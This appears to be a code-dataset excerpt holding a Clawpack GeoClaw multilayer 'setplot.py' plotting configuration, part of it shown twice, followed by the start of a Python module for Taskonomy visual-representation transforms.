plotfigure = plotdata.new_plotfigure(name='profile')
plotfigure.show = False
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = [-1.1, 0.1]
plotaxes.title = "Profile of depth"
plotaxes.afteraxes = profile_afteraxes
slice_index = 30
# Internal surface
def bathy_profile(current_data):
return current_data.x[:, slice_index], b(current_data)[:, slice_index]
def lower_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta2(current_data)[slice_index, :]
def upper_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta1(current_data)[slice_index, :]
def top_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u1(current_data)[slice_index, :]
def bottom_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u2(current_data)[slice_index, :]
# Bathy
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = bathy_profile
plotitem.plot_var = 0
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'k'
plotitem.show = True
# Internal Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = lower_surface
plotitem.plot_var = 7
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'b'
plotitem.show = True
# Upper Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = upper_surface
plotitem.plot_var = 6
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = (0.2, 0.8, 1.0)
plotitem.show = True
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Y-Velocity'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# Water
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# # plotitem.plot_var = geoplot.surface
# plotitem.plot_var = water_v
# plotitem.pcolor_cmap = colormaps.make_colormap({1.0:'r',0.5:'w',0.0:'b'})
# # plotitem.pcolor_cmin = -1.e-10
# # plotitem.pcolor_cmax = 1.e-10
# # plotitem.pcolor_cmin = -2.5 # -3.0
# # plotitem.pcolor_cmax = 2.5 # 3.0
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1,1,1]
# Land
ml_plot.add_land(plotaxes, 1)
# ========================================================================
# Contour plot for surface
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_surface',figno=15)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
# Top Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=1,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 1, plot_type='contour')
# Internal Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=2,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 2, plot_type='contour')
# ========================================================================
# Contour plot for speed
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_speed',figno=16)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Current'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
# Surface
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = ml_plot.water_speed_depth_ave
plotitem.kwargs = {'linewidths':1}
# plotitem.contour_levels = [1.0,2.0,3.0,4.0,5.0,6.0]
plotitem.contour_levels = [0.5,1.5,3,4.5,6.0]
plotitem.amr_contour_show = [1,1,1]
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
plotitem.amr_contour_colors = 'k'
# plotitem.amr_contour_colors = ['r','k','b'] # color on each level
# plotitem.amr_grid_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.show = True
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = geoplot.land
plotitem.contour_nlevels = 40
plotitem.contour_min = 0.0
plotitem.contour_max = 100.0
plotitem.amr_contour_colors = ['g'] # color on each level
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = 0
plotitem.amr_patchedges_show = 0
plotitem.show = True
# ========================================================================
# Grid Cells
# ========================================================================
# Figure for grid cells
plotfigure = plotdata.new_plotfigure(name='cells', figno=2)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.title = 'Grid patches'
plotaxes.scaled = True
# Set up for item on these axes:
plotitem = plotaxes.new_plotitem(plot_type='2d_patch')
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
# ========================================================================
# Vorticity Plot
# ========================================================================
# plotfigure = plotdata.new_plotfigure(name='vorticity',figno=17)
# plotfigure.show = False
# plotaxes = plotfigure.new_plotaxes()
# plotaxes.title = "Vorticity"
# plotaxes.scaled = True
# plotaxes.xlimits = xlimits
# plotaxes.ylimits = ylimits
# plotaxes.afteraxes = pcolor_afteraxes
#
# # Vorticity
# plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = 9
# plotitem.imshow_cmap = plt.get_cmap('PRGn')
# # plotitem.pcolor_cmap = plt.get_cmap('PuBu')
# # plotitem.pcolor_cmin = 0.0
# # plotitem.pcolor_cmax = 6.0
# plotitem.imshow_cmin = -1.e-2
# plotitem.imshow_cmax = 1.e-2
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1]
#
# # Land
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# plotitem.plot_var = geoplot.land
# plotitem.pcolor_cmap = geoplot.land_colors
# plotitem.pcolor_cmin = 0.0
# plotitem.pcolor_cmax = 80.0
# plotitem.add_colorbar = False
# plotitem.amr_celledges_show = [0,0,0]
# ========================================================================
# Figures for gauges
# Top
plotfigure = plotdata.new_plotfigure(name='Surface & topo',
type='each_gauge',
figno=301)
plotfigure.show = True
plotfigure.clf_each_gauge = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = top_surface_limits
plotaxes.title = 'Top Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 6
plotitem.plotstyle = 'b-'
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = internal_surface_limits
plotaxes.title = 'Bottom Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 7
plotitem.plotstyle = 'b-'
# =========================================================================
# Other plots
# Gauge Locations - Enable to see where gauges are located
def locations_afteraxes(current_data, gaugenos='all'):
gaugetools.plot_gauge_locations(current_data.plotdata,
gaugenos=gaugenos,
format_string='kx',
add_labels=True)
pcolor_afteraxes(current_data)
plotfigure = plotdata.new_plotfigure(name='Gauge Locations')
plotfigure.show = False
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 1, bounds=top_surface_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 2, bounds=internal_surface_limits)
ml_plot.add_land(plotaxes, 2)
# -----------------------------------------
# Parameters used only when creating html and/or latex hardcopy
# e.g., via pyclaw.plotters.frametools.printframes:
plotdata.printfigs = True # print figures
plotdata.print_format = 'png' # file format
plotdata.print_framenos = 'all' # list of frames to print
plotdata.print_fignos = 'all' # list of figures to print
plotdata.html = True # create html files of plots?
plotdata.latex = False # create latex file of plots?
plotdata.latex_figsperline = 2 # layout of plots
plotdata.latex_framesperline = 1 # layout of plots
plotdata.latex_makepdf = False # also run pdflatex?
plotdata.parallel = True # make multiple frame png's at once
return plotdata
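# ----------------------------------------------------------------------------
# Usage sketch (added for illustration, not part of the original example):
# `setplot` is normally not called directly.  After a run has written its
# output, Clawpack's plotting drivers import this module and call
# `setplot(plotdata)`.  Assuming the usual GeoClaw workflow and an `_output`
# directory (both assumptions, not taken from this file), the figures
# configured above could be produced roughly as follows:
#
#     from clawpack.visclaw.data import ClawPlotData
#     plotdata = ClawPlotData()
#     plotdata.outdir = '_output'
#     plotdata = setplot(plotdata)
#     # then e.g. `make plots`, or an interactive session via Iplotclaw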
|
examples/multi-layer/plane_wave/setplot.py
|
from __future__ import absolute_import
from __future__ import print_function
import os
import numpy as np
import matplotlib.pyplot as plt
from clawpack.visclaw import geoplot, gaugetools
import clawpack.clawutil.data as clawutil
import clawpack.amrclaw.data as amrclaw
import clawpack.geoclaw.data
import clawpack.geoclaw.multilayer.plot as ml_plot
def setplot(plotdata=None, bathy_location=0.15, bathy_angle=0.0,
bathy_left=-1.0, bathy_right=-0.2):
"""Setup the plotting data objects.
Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.
Output: a modified version of plotdata.
returns plotdata object
"""
if plotdata is None:
from clawpack.visclaw.data import ClawPlotData
plotdata = ClawPlotData()
# Load data from output
clawdata = clawutil.ClawInputData(2)
clawdata.read(os.path.join(plotdata.outdir, 'claw.data'))
multilayer_data = clawpack.geoclaw.data.MultilayerData()
multilayer_data.read(os.path.join(plotdata.outdir, 'multilayer.data'))
def transform_c2p(x, y, x0, y0, theta):
return ((x+x0)*np.cos(theta) - (y+y0)*np.sin(theta),
(x+x0)*np.sin(theta) + (y+y0)*np.cos(theta))
def transform_p2c(x, y, x0, y0, theta):
return (x*np.cos(theta) + y*np.sin(theta) - x0,
-x*np.sin(theta) + y*np.cos(theta) - y0)
# Setup bathymetry reference lines
with open(os.path.join(plotdata.outdir, "bathy_geometry.data"), 'r') \
as bathy_geometry_file:
bathy_location = float(bathy_geometry_file.readline())
bathy_angle = float(bathy_geometry_file.readline())
x = [0.0, 0.0]
y = [0.0, 1.0]
x1, y1 = transform_c2p(x[0], y[0], bathy_location, 0.0, bathy_angle)
x2, y2 = transform_c2p(x[1], y[1], bathy_location, 0.0, bathy_angle)
if abs(x1 - x2) < 10**-3:
x = [x1, x1]
y = [clawdata.lower[1], clawdata.upper[1]]
else:
m = (y1 - y2) / (x1 - x2)
x[0] = (clawdata.lower[1] - y1) / m + x1
y[0] = clawdata.lower[1]
x[1] = (clawdata.upper[1] - y1) / m + x1
y[1] = clawdata.upper[1]
ref_lines = [((x[0], y[0]), (x[1], y[1]))]
plotdata.clearfigures()
plotdata.save_frames = False
# ========================================================================
# Generic helper functions
def pcolor_afteraxes(current_data):
bathy_ref_lines(current_data)
def contour_afteraxes(current_data):
axes = plt.gca()
pos = -80.0 * (23e3 / 180) + 500e3 - 5e3
axes.plot([pos, pos], [-300e3, 300e3], 'b',
[pos-5e3, pos-5e3], [-300e3, 300e3], 'y')
wind_contours(current_data)
bathy_ref_lines(current_data)
def profile_afteraxes(current_data):
pass
def bathy_ref_lines(current_data):
axes = plt.gca()
for ref_line in ref_lines:
x1 = ref_line[0][0]
y1 = ref_line[0][1]
x2 = ref_line[1][0]
y2 = ref_line[1][1]
axes.plot([x1, x2], [y1, y2], 'y--', linewidth=1)
# ========================================================================
# Axis limits
xlimits = [-0.5, 0.5]
ylimits = [-0.5, 0.5]
eta = [multilayer_data.eta[0], multilayer_data.eta[1]]
top_surface_limits = [eta[0] - 0.03, eta[0] + 0.03]
internal_surface_limits = [eta[1] - 0.015, eta[1] + 0.015]
top_speed_limits = [0.0, 0.1]
internal_speed_limits = [0.0, 0.03]
# ========================================================================
# Surface Elevations
plotfigure = plotdata.new_plotfigure(name='Surface')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_surface_elevation(plotaxes,1,bounds=top_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,1,bounds=[-0.06,0.06])
# ml_plot.add_surface_elevation(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# ml_plot.add_surface_elevation(plotaxes,2,bounds=[-300-0.5,-300+0.5])
ml_plot.add_surface_elevation(plotaxes,2,bounds=internal_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Depths
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='Depths', figno=42)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Layer Depth'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,1,bounds=[-0.1,1.1])
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Bottom Layer Depth'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,2,bounds=[-0.1,0.7])
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Water Speed
plotfigure = plotdata.new_plotfigure(name='speed')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Top Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_speed(plotaxes, 1, bounds=top_speed_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Bottom Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_speed(plotaxes,2,bounds=[0.0,1e-10])
ml_plot.add_speed(plotaxes,2,bounds=internal_speed_limits)
# add_speed(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# Individual components
plotfigure = plotdata.new_plotfigure(name='speed_components',figno=401)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,14)}
# Top layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,1)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,1,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,1,bounds=[-0.000125,0.000125])
ml_plot.add_y_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,3)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,2,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,4)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,2,bounds=[-0.8e-6,.8e-6])
ml_plot.add_y_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Profile Plots
# Note that these are not currently plotted by default - set
    # `plotfigure.show = True` if you want this to be plotted
plotfigure = plotdata.new_plotfigure(name='profile')
plotfigure.show = False
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = [-1.1, 0.1]
plotaxes.title = "Profile of depth"
plotaxes.afteraxes = profile_afteraxes
slice_index = 30
# Internal surface
def bathy_profile(current_data):
return current_data.x[:, slice_index], b(current_data)[:, slice_index]
def lower_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta2(current_data)[slice_index, :]
def upper_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta1(current_data)[slice_index, :]
def top_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u1(current_data)[slice_index, :]
def bottom_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u2(current_data)[slice_index, :]
# Bathy
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = bathy_profile
plotitem.plot_var = 0
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'k'
plotitem.show = True
# Internal Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = lower_surface
plotitem.plot_var = 7
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'b'
plotitem.show = True
# Upper Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = upper_surface
plotitem.plot_var = 6
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = (0.2, 0.8, 1.0)
plotitem.show = True
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Y-Velocity'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# Water
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# # plotitem.plot_var = geoplot.surface
# plotitem.plot_var = water_v
# plotitem.pcolor_cmap = colormaps.make_colormap({1.0:'r',0.5:'w',0.0:'b'})
# # plotitem.pcolor_cmin = -1.e-10
# # plotitem.pcolor_cmax = 1.e-10
# # plotitem.pcolor_cmin = -2.5 # -3.0
# # plotitem.pcolor_cmax = 2.5 # 3.0
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1,1,1]
# Land
ml_plot.add_land(plotaxes, 1)
# ========================================================================
# Contour plot for surface
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_surface',figno=15)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
# Top Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=1,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 1, plot_type='contour')
# Internal Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=2,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 2, plot_type='contour')
# ========================================================================
# Contour plot for speed
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_speed',figno=16)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Current'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
# Surface
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = ml_plot.water_speed_depth_ave
plotitem.kwargs = {'linewidths':1}
# plotitem.contour_levels = [1.0,2.0,3.0,4.0,5.0,6.0]
plotitem.contour_levels = [0.5,1.5,3,4.5,6.0]
plotitem.amr_contour_show = [1,1,1]
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
plotitem.amr_contour_colors = 'k'
# plotitem.amr_contour_colors = ['r','k','b'] # color on each level
# plotitem.amr_grid_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.show = True
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = geoplot.land
plotitem.contour_nlevels = 40
plotitem.contour_min = 0.0
plotitem.contour_max = 100.0
plotitem.amr_contour_colors = ['g'] # color on each level
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = 0
plotitem.amr_patchedges_show = 0
plotitem.show = True
# ========================================================================
# Grid Cells
# ========================================================================
# Figure for grid cells
plotfigure = plotdata.new_plotfigure(name='cells', figno=2)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.title = 'Grid patches'
plotaxes.scaled = True
# Set up for item on these axes:
plotitem = plotaxes.new_plotitem(plot_type='2d_patch')
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
# ========================================================================
# Vorticity Plot
# ========================================================================
# plotfigure = plotdata.new_plotfigure(name='vorticity',figno=17)
# plotfigure.show = False
# plotaxes = plotfigure.new_plotaxes()
# plotaxes.title = "Vorticity"
# plotaxes.scaled = True
# plotaxes.xlimits = xlimits
# plotaxes.ylimits = ylimits
# plotaxes.afteraxes = pcolor_afteraxes
#
# # Vorticity
# plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = 9
# plotitem.imshow_cmap = plt.get_cmap('PRGn')
# # plotitem.pcolor_cmap = plt.get_cmap('PuBu')
# # plotitem.pcolor_cmin = 0.0
# # plotitem.pcolor_cmax = 6.0
# plotitem.imshow_cmin = -1.e-2
# plotitem.imshow_cmax = 1.e-2
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1]
#
# # Land
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# plotitem.plot_var = geoplot.land
# plotitem.pcolor_cmap = geoplot.land_colors
# plotitem.pcolor_cmin = 0.0
# plotitem.pcolor_cmax = 80.0
# plotitem.add_colorbar = False
# plotitem.amr_celledges_show = [0,0,0]
# ========================================================================
# Figures for gauges
# Top
plotfigure = plotdata.new_plotfigure(name='Surface & topo',
type='each_gauge',
figno=301)
plotfigure.show = True
plotfigure.clf_each_gauge = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = top_surface_limits
plotaxes.title = 'Top Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 6
plotitem.plotstyle = 'b-'
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = internal_surface_limits
plotaxes.title = 'Bottom Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 7
plotitem.plotstyle = 'b-'
# =========================================================================
# Other plots
# Gauge Locations - Enable to see where gauges are located
def locations_afteraxes(current_data, gaugenos='all'):
gaugetools.plot_gauge_locations(current_data.plotdata,
gaugenos=gaugenos,
format_string='kx',
add_labels=True)
pcolor_afteraxes(current_data)
plotfigure = plotdata.new_plotfigure(name='Gauge Locations')
plotfigure.show = False
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 1, bounds=top_surface_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1, 2, 2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = locations_afteraxes
ml_plot.add_surface_elevation(plotaxes, 2, bounds=internal_surface_limits)
ml_plot.add_land(plotaxes, 2)
# -----------------------------------------
# Parameters used only when creating html and/or latex hardcopy
# e.g., via pyclaw.plotters.frametools.printframes:
plotdata.printfigs = True # print figures
plotdata.print_format = 'png' # file format
plotdata.print_framenos = 'all' # list of frames to print
plotdata.print_fignos = 'all' # list of figures to print
plotdata.html = True # create html files of plots?
plotdata.latex = False # create latex file of plots?
plotdata.latex_figsperline = 2 # layout of plots
plotdata.latex_framesperline = 1 # layout of plots
plotdata.latex_makepdf = False # also run pdflatex?
plotdata.parallel = True # make multiple frame png's at once
return plotdata
| 0.765506 | 0.521654 |
from .taskonomy_network import TaskonomyEncoder, TaskonomyDecoder, TaskonomyNetwork, TASKONOMY_PRETRAINED_URLS, TASKS_TO_CHANNELS
import multiprocessing.dummy as mp
import torch
default_device = 'cuda' if torch.cuda.is_available() else 'cpu'
def representation_transform(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks=[feature_task], device=device)
def multi_representation_transform(img, feature_tasks=['normal'], device=default_device):
'''
    Transforms an RGB image into features driven by some vision tasks
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
        shape  (batch_size, 8*len(feature_tasks), 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks, device)
def max_coverage_featureset_transform(img, k=4, device=default_device):
'''
    Transforms an RGB image into features driven by a set of vision tasks.
The tasks are chosen according to the Max-Coverage Min-Distance Featureset
From the paper:
Mid-Level Visual Representations Improve Generalization and Sample Efficiency
for Learning Visuomotor Policies.
